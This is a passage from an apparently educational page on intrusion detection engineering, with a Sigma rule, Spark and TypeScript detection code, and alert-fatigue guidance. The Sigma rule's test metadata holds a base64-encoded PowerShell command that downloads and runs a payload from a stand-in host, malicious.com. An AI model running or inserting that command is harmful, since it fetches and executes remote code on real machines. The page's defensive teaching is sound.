Encryption impact	Limited view into encrypted payloads	Sees decrypted data on host
Coverage	All hosts on network segment	Only hosts with agents installed
Maintenance	Centralized, few devices	Distributed across all hosts
Performance impact	None on endpoints	Some CPU/memory on each host
Evasion	Encrypted channels, protocol abuse	Disabling agent, kernel rootkits
Best for	Network attacks, lateral movement, exfiltration	Malware, privilege escalation, insider threats

Popular HIDS/EDR Solutions:

OSSEC/Wazuh: Open-source HIDS with file integrity monitoring, log analysis, rootkit detection
osquery: Endpoint visibility through SQL queries against system state
CrowdStrike Falcon: Cloud-native EDR with real-time threat detection
Carbon Black: Behavioral detection with threat hunting capabilities
Microsoft Defender for Endpoint: Integrated Windows security with EDR

Endpoint Detection and Response (EDR) extends HIDS with:

Real-time response capabilities (kill process, isolate host, collect forensics)
Behavioral analysis beyond signatures
Threat hunting interfaces
Incident timeline reconstruction

Complete Visibility Requires Both

Detection Engineering

The Detection Development Lifecycle:

Threat Research: Understand attack techniques (MITRE ATT&CK framework is invaluable)
Data Prerequisites: Identify which log sources provide visibility into the technique
Rule Development: Create detection logic (queries, signatures, models)
Validation Testing: Test against attack simulations to confirm detection
False Positive Tuning: Test against production data to assess noise
Deployment: Push to production with monitoring
Performance Monitoring: Track true positives, false positives, rule performance
Iteration: Refine rules based on feedback

MITRE ATT&CK as Detection Framework

The MITRE ATT&CK framework catalogs known adversary tactics and techniques. It provides:

Tactics: High-level goals (Initial Access, Persistence, Lateral Movement, etc.)
Techniques: Specific methods to achieve tactics (Phishing, Scheduled Task, Pass the Hash)
Procedures: Real-world examples of how attackers use techniques

Coverage mapping: Map your detections to ATT&CK techniques to identify gaps:

Tactic: Persistence
├── T1053: Scheduled Task/Job
│   ├── Detection: Windows Task Scheduler events (4698, 4699)
│   ├── Coverage: HIGH
│   └── Last validated: 2024-01-15
├── T1547: Boot/Logon Autostart Execution  
│   ├── Detection: Registry key monitoring
│   ├── Coverage: MEDIUM (some keys missed)
│   └── Last validated: 2023-11-20
└── T1053: Cron Jobs
    ├── Detection: Not implemented
    ├── Coverage: NONE
    └── Priority: Add to backlog

detection_rule_example.yaml
YAML
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
# Sigma Rule Format - Platform-agnostic detection rule
title: Suspicious PowerShell Encoded Command
id: d8c0b5e1-2d3f-4a5c-9b8e-1234567890ab
status: production
description: |
  Detects PowerShell execution with base64-encoded commands,
  commonly used by malware to obfuscate malicious scripts.
references:
  - https://attack.mitre.org/techniques/T1059/001/
  - https://attack.mitre.org/techniques/T1027/
author: Security Team
date: 2024/01/15
modified: 2024/01/20
 
tags:
  - attack.execution
  - attack.t1059.001
  - attack.defense_evasion
  - attack.t1027
 
logsource:
  category: process_creation
  product: windows
 
detection:
  selection:
    Image|endswith:
      - '\powershell.exe'
      - '\pwsh.exe'
    CommandLine|contains:
      - '-encodedcommand'
      - '-enc '
      - '-en '
      - '-ec '
  filter_legitimate:
    # Known legitimate uses of encoded commands
    ParentImage|endswith:
      - '\System32\svchost.exe'  # Windows Update
      - '\Microsoft\ConfigMgr\AdminConsole\bin\Microsoft.ConfigurationManagement.exe'
    User|contains: 'SYSTEM'
  condition: selection and not filter_legitimate
 
falsepositives:
  - SCCM/MECM deployment scripts
  - Some legitimate admin tools
  - Automated system management
 
level: high
 
# Testing metadata
testing:
  attack_simulation:
    command: "powershell.exe -encodedcommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AbQBhAGwAaQBjAGkAbwB1AHMALgBjAG8AbQAvAHAAYQB5AGwAbwBhAGQAJwApAA=="
    expected: alert
  benign_simulation:
    command: "powershell.exe -encodedcommand VwByAGkAdABlAC0ASABvAHMAdAAgACcASABlAGwAbABvACcA"
    expected: alert  # Still triggers, shows false positive rate
  last_validated: 2024-01-18
  true_positive_rate: 0.92
  false_positive_rate: 0.15

Detection Rule Testing

Detection rules must be tested before deployment—just like application code. Testing approaches:

Red Team Simulations: Execute actual attacks in controlled environments to validate detection

Atomic Red Team: Open-source library of attack simulations mapped to ATT&CK

# Run specific technique simulation
Invoke-AtomicTest T1059.001 -TestNumbers 1

MITRE Caldera: Automated adversary emulation platform
Historical Replay: Replay known-malicious traffic/logs through detection rules
Production Shadowing: Run new rules in shadow mode (log matches but don't alert) to measure false positive rates before activation

Detection Debt

Detection at Scale

Scale Challenges:

Volume: A medium enterprise generates 10-100 billion events/day. Running complex detection rules against every event is computationally prohibitive.
Velocity: Events must be processed in near real-time for detections to be actionable. Detecting an attack 4 hours later isn't useful.
Variety: Events come in hundreds of formats from diverse sources. Normalizing everything for consistent analysis is challenging.
Alert Volume: Even a 0.01% false positive rate on 10 billion events is 1 million false alerts/day—completely unmanageable.

Tiered Detection Architecture

Effective scaled detection uses a tiered approach, with different detection layers for different event volumes and detection complexities:

Tier 1: Stream Processing (Real-time)

Process every event as it arrives
Simple, high-confidence rules only
Sub-second detection latency
Technologies: Apache Kafka Streams, Apache Flink, Esper

Tier 2: Micro-Batch Processing (Near Real-time)

Process event batches (seconds to minutes)
More complex rules with short-term correlation
Detection latency: seconds to minutes
Technologies: Spark Structured Streaming, Kafka Streams with windowing

Tier 3: Batch Processing (Periodic)

Process large historical datasets
Complex analytics, ML models, long-term correlation
Detection latency: hours
Technologies: Spark, Elastic queries, data warehouses

Tier 4: Threat Hunting (Manual)

Human-driven investigation
Hypothesis-based exploration of data
Detection latency: days to weeks
Technologies: Jupyter notebooks, hunting platforms (Kestrel)

streaming_detection.py
Python
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
from pyspark.sql import SparkSession
from pyspark.sql.functions import *
from pyspark.sql.window import Window
 
# Real-time detection using Spark Structured Streaming
spark = SparkSession.builder.appName("SecurityDetection").getOrCreate()
 
# Read from Kafka stream
events = (spark.readStream
    .format("kafka")
    .option("kafka.bootstrap.servers", "kafka:9092")
    .option("subscribe", "security-events")
    .load()
    .select(from_json(col("value").cast("string"), event_schema).alias("event"))
    .select("event.*"))
 
# Detection: Brute Force Login Attempts
# Alert when >10 failed logins from same IP in 5 minutes
login_failures = events.filter(
    (col("event.category") == "authentication") &
    (col("event.outcome") == "failure")
)
 
brute_force = (login_failures
    .withWatermark("@timestamp", "10 minutes")
    .groupBy(
        window(col("@timestamp"), "5 minutes"),
        col("source.ip")
    )
    .agg(
        count("*").alias("failure_count"),
        collect_set("user.name").alias("targeted_users")
    )
    .filter(col("failure_count") > 10))
 
# Detection: Impossible Travel
# Alert when same user authenticates from geographically distant 
# locations in short time period
auth_success = events.filter(
    (col("event.category") == "authentication") &
    (col("event.outcome") == "success")
)
 
user_window = Window.partitionBy("user.id").orderBy("@timestamp")
 
impossible_travel = (auth_success
    .withColumn("prev_location", lag("source.geo").over(user_window))
    .withColumn("prev_time", lag("@timestamp").over(user_window))
    .withColumn("distance_km", calculate_distance(
        col("source.geo"), col("prev_location")))
    .withColumn("time_diff_hours", 
        (col("@timestamp").cast("long") - col("prev_time").cast("long")) / 3600)
    .withColumn("required_speed_kmh", 
        col("distance_km") / col("time_diff_hours"))
    # Alert if required travel speed > 1000 km/h (impossible without flight)
    .filter(col("required_speed_kmh") > 1000))
 
# Write alerts to Kafka topic
(brute_force.union(impossible_travel)
    .selectExpr("to_json(struct(*)) as value")
    .writeStream
    .format("kafka")
    .option("kafka.bootstrap.servers", "kafka:9092")
    .option("topic", "security-alerts")
    .option("checkpointLocation", "/checkpoints/detection")
    .outputMode("update")
    .start())

Pre-filtering Strategies

Not every event needs full detection analysis. Implement pre-filtering to reduce load on detection engines:

Known-Good Filtering: Events from verified internal monitoring systems, health checks, expected automated processes can be filtered early (but still logged).
Severity-Based Routing: Route only high-severity source events through expensive detection rules.
Sampling for Baselines: For behavioral models, statistical sampling can establish baselines without processing every event.
Event Deduplication: Repeated identical events (from chatty systems) can be deduplicated with count aggregation.

Raw Events: 10 billion/day
↓ Known-good filter (remove monitoring, health checks)
Filtered: 4 billion/day
↓ Deduplication (collapse repeated events)
Deduplicated: 1 billion/day
↓ Severity routing (only high-severity for complex rules)
Complex Detection: 100 million/day

Alert Management and Critical Response

Detection is only valuable if alerts lead to action. Alert management transforms raw detections into investigations and responses.

The Alert Fatigue Crisis

Alert fatigue is the biggest operational challenge in security monitoring. Studies show:

Security teams receive an average of 10,000-100,000 alerts/day
Only 4% of security alerts are investigated
Alert fatigue is a leading cause of SOC analyst burnout and turnover

The consequence: real attacks are missed because they're lost in the noise of false positives and low-priority alerts.

Alert Quality Metrics

Measure and optimize these metrics:

True Positive Rate (TPR): Of all actual attacks, what percentage did we detect?

TPR = True Positives / (True Positives + False Negatives)

Precision (Positive Predictive Value): Of all alerts, what percentage were real attacks?

Precision = True Positives / (True Positives + False Positives)

Mean Time to Detect (MTTD): How long between attack start and alert generation?

Mean Time to Investigate (MTTI): How long between alert and analyst beginning investigation?

Optimize for precision without sacrificing critical recall. Most organizations run 20-30% precision (70-80% false positive rate). World-class detection achieves 70%+ precision.

Strategies for Reducing Alert Fatigue

•Alert Enrichment: Automatically add context (asset criticality, user risk score, threat intel matches) to help analysts triage faster.
•Alert Correlation: Group related alerts into incidents. 100 alerts from the same attack chain should be 1 incident, not 100 tickets.
•Risk-Based Prioritization: Score alerts by risk (threat severity × asset criticality × user risk) and focus analyst time on highest-risk alerts.
•Tuning Cadence: Establish regular (weekly) rule tuning sessions to address high-false-positive rules rather than letting them generate noise indefinitely.
•Suppression Rules: After investigation, create explicit suppressions for known false positives (with expiration dates to force re-evaluation).
•Automation (SOAR): Automate investigation steps for common alerts—gather context, check IOC reputation, assess if asset is critical—before requiring human attention.
•Machine Learning Triage: ML models trained on analyst decisions can auto-close likely false positives, escalating only uncertain ones.

alert_enrichment_pipeline.ts
TypeScript
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
interface SecurityAlert {
  id: string;
  timestamp: string;
  rule_name: string;
  severity: 'low' | 'medium' | 'high' | 'critical';
  source_ip?: string;
  user_id?: string;
  asset_id?: string;
  raw_event: Record<string, unknown>;
}
 
interface EnrichedAlert extends SecurityAlert {
  enrichment: {
    asset?: {
      name: string;
      criticality: 'low' | 'medium' | 'high' | 'critical';
      owner: string;
      network_zone: string;
    };
    user?: {
      name: string;
      department: string;
      risk_score: number;
      recent_activity_anomalies: number;
    };
    threat_intel?: {
      ip_reputation: 'clean' | 'suspicious' | 'malicious';
      known_iocs: string[];
      threat_actor?: string;
    };
    historical?: {
      similar_alerts_30d: number;
      false_positive_rate: number;
      avg_investigation_time_min: number;
    };
  };
  risk_score: number;
  auto_triage_recommendation: 'investigate' | 'likely_fp' | 'auto_close';
}
 
async function enrichAlert(alert: SecurityAlert): Promise<EnrichedAlert> {
  // Parallel enrichment from multiple sources
  const [asset, user, threatIntel, historical] = await Promise.all([
    alert.asset_id ? assetDatabase.lookup(alert.asset_id) : null,
    alert.user_id ? identityService.lookup(alert.user_id) : null,
    alert.source_ip ? threatIntelligence.checkIP(alert.source_ip) : null,
    alertHistoryService.getSimilarAlerts(alert.rule_name, 30),
  ]);
 
  // Calculate composite risk score
  const riskScore = calculateRiskScore({
    alertSeverity: alert.severity,
    assetCriticality: asset?.criticality,
    userRiskScore: user?.risk_score,
    threatIntelMatch: threatIntel?.ip_reputation === 'malicious',
    historicalFPRate: historical?.false_positive_rate,
  });
 
  // Auto-triage recommendation
  const recommendation = determineTriageAction({
    riskScore,
    fpRate: historical?.false_positive_rate || 0,
    threatIntel,
    userAnomalies: user?.recent_activity_anomalies || 0,
  });
 
  return {
    ...alert,
    enrichment: { asset, user, threat_intel: threatIntel, historical },
    risk_score: riskScore,
    auto_triage_recommendation: recommendation,
  };
}
 
function calculateRiskScore(factors: {
  alertSeverity: string;
  assetCriticality?: string;
  userRiskScore?: number;
  threatIntelMatch: boolean;
  historicalFPRate?: number;
}): number {
  let score = 0;
  
  // Base score from alert severity
  const severityScores = { low: 10, medium: 30, high: 60, critical: 90 };
  score += severityScores[factors.alertSeverity] || 20;
  
  // Asset criticality multiplier
  const criticalityMultipliers = { low: 0.5, medium: 1.0, high: 1.5, critical: 2.0 };
  score *= criticalityMultipliers[factors.assetCriticality] || 1.0;
  
  // User risk score contribution
  if (factors.userRiskScore) {
    score += factors.userRiskScore * 0.3;
  }
  
  // Threat intel boost
  if (factors.threatIntelMatch) {
    score *= 1.5;
  }
  
  // Historical false positive penalty
  if (factors.historicalFPRate && factors.historicalFPRate > 0.7) {
    score *= 0.5; // Heavily penalize high-FP rules
  }
  
  return Math.min(100, Math.max(0, score));
}

Implementing IDS in Practice

Deploying intrusion detection in a real environment requires careful planning and incremental rollout. Here's a practical implementation approach:

IDS Implementation Phases
Phase	Duration	Activities	Success Criteria
Discovery	2-4 weeks	Inventory assets, map data sources, identify critical systems, understand attack surface	Complete asset inventory, data source catalog
Foundation	4-8 weeks	Deploy log collection, establish SIEM/detection platform, implement baseline detections	All critical logs collected, basic detections active
Coverage Expansion	8-12 weeks	Add detection rules mapped to ATT&CK, integrate threat intel, tune false positives	80%+ ATT&CK coverage for critical techniques
Optimization	Ongoing	Reduce false positives, automate response, improve MTTD, threat hunting	Precision >50%, MTTD <1 hour for critical

Starting Detection Rules

When building initial detection capability, prioritize these high-value, low-noise detections:

Authentication-Based:

Successful login after multiple failures (credential guessing success)
Login from new country for user
Admin account login from non-admin workstation
Service account interactive login
Login outside business hours for users without that pattern

Administrative Actions:

New admin account creation
Security group membership changes
Audit policy modifications
New scheduled task on server
Remote access tool installation

Network-Based:

Connection to known-bad IPs (threat intel)
DNS queries to known-bad domains
Large outbound data transfer to unusual destination
Internal scanning activity (port sweep)
SMB traffic between workstations (unusual peer-to-peer)

Start Simple, Iterate Often

Summary: Intrusion Detection Essentials

Key Takeaways

•IDS finds attackers by analyzing events — Detection identifies malicious patterns in the vast stream of normal activity.
•Combine signature and behavioral detection — Signatures catch known attacks with precision; behavior catches novel threats.
•Deploy both network and host-based detection — NIDS sees network activity; HIDS sees what happens on endpoints. Complete visibility requires both.
•Treat detection as engineering — Version control rules, test with simulations, measure effectiveness, iterate based on data.
•Scale requires tiered architecture — Stream processing for real-time, batch for complex analytics, hunting for human insight.
•Fight alert fatigue deliberately — Enrichment, correlation, automation, and continuous tuning keep alert volumes manageable.
•Start simple and iterate — High-confidence, well-tuned rules outperform complex noisy detection. Build operational excellence first.

What's Next:

Page Complete